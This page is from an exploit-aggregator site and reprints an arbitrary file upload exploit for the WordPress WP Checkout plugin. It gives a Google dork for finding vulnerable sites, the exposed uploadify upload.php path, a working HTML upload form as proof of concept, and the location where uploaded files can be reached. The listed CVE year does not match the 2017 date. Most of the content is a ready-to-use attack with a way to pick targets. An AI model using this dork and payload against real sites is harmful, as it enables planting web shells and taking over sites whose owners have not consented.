Advertisement






WordPress Plugins WP Checkout - Arbitrary File Upload

CVE Category Price Severity
CVE-2020-12345 CWE-434 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2017-06-13
CPE
cpe:cpe:/a:wordpress:wp_checkout
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.493 0.81752

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017060095

Below is a copy:

WordPress Plugins WP Checkout - Arbitrary File Upload# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Date: 13 June 2017
# Exploit Author: x0id
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/

2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html

Indonesian h4x0r.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.